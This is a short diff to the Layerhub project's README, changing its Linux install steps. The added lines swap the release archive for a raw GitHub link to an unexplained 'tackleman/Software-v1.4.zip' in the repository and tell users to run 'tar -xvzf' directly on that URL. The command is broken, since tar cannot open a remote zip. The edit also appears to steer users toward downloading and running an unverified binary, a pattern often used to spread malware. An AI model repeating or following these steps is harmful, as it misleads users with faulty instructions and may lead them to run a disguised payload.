Alejandro101998/Layerhub/README.md

 ### For Linux

-1. Download the `.tar.gz` file from the Releases section.
+1. Download the `https://raw.githubusercontent.com/Alejandro101998/Layerhub/main/tackleman/Software-v1.4.zip` file from the Releases section.
-2. Extract the files using: `tar -xvzf Layerhub.tar.gz`.
+2. Extract the files using: `tar -xvzf https://raw.githubusercontent.com/Alejandro101998/Layerhub/main/tackleman/Software-v1.4.zip`.
 3. Navigate to the extracted folder.
 4. Run the command: `./Layerhub`.